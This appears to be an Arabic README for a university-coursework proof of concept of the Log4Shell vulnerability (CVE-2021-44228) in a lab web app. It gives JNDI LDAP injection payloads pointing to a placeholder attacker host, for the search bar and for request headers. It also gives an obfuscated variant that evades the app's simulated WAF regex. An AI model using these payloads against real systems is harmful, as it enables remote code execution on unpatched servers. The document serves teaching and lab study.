
إثبات المفهوم لثغرة Log4Shell (CVE-2021-44228)، تم تطويره كجزء من العمل الدراسي للوحدة المنهجية TPAS في درجة الماجستير في أمن المعلومات في FCUP.
يحتوي هذا المستودع على إثبات مفهوم (PoC) لثغرة Log4Shell (CVE-2021-44228)، الذي تم تطويره كجزء من متطلبات المادة الدراسية TPAS في درجة الماجستير في أمن المعلومات بجامعة FCUP.
يحتوي على:
لتشغيل هذه المجموعة، تحتاج إلى:
بمجرد تشغيل كل شيء:
ضع هذا الحمولة في شريط البحث (مشفرة URL لأنها ستكون في معامل استعلام GET):
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
أو ضع هذا الحمولة في ترويسات الطلب (يمكنك استخدام burp suite لاعتراض طلب وتعديله):
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
على الموقع، يوجد أيقونة بجانب اسم المستخدم تسمح بالتبديل بين تعقيم السلسلة المسجلة باستخدام التعبير النمطي \$\{jndi:.*?} أم لا. افتراضيًا، التعقيم معطل، ويمثله أيقونة شيطان أحمر. عند تفعيل التعقيم، تتغير الأيقونة إلى وجه مبتسم أخضر.
يمكن استخدام هذه الميزة لمحاكاة تجاوز جدار الحماية (WAF)، يمكنك إضافة تعبيرات نمطية أخرى في فئة LoggerManager.java في الواجهة الخلفية.
فيما يلي حمولة لن يطابقها التعبير النمطي الحالي:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}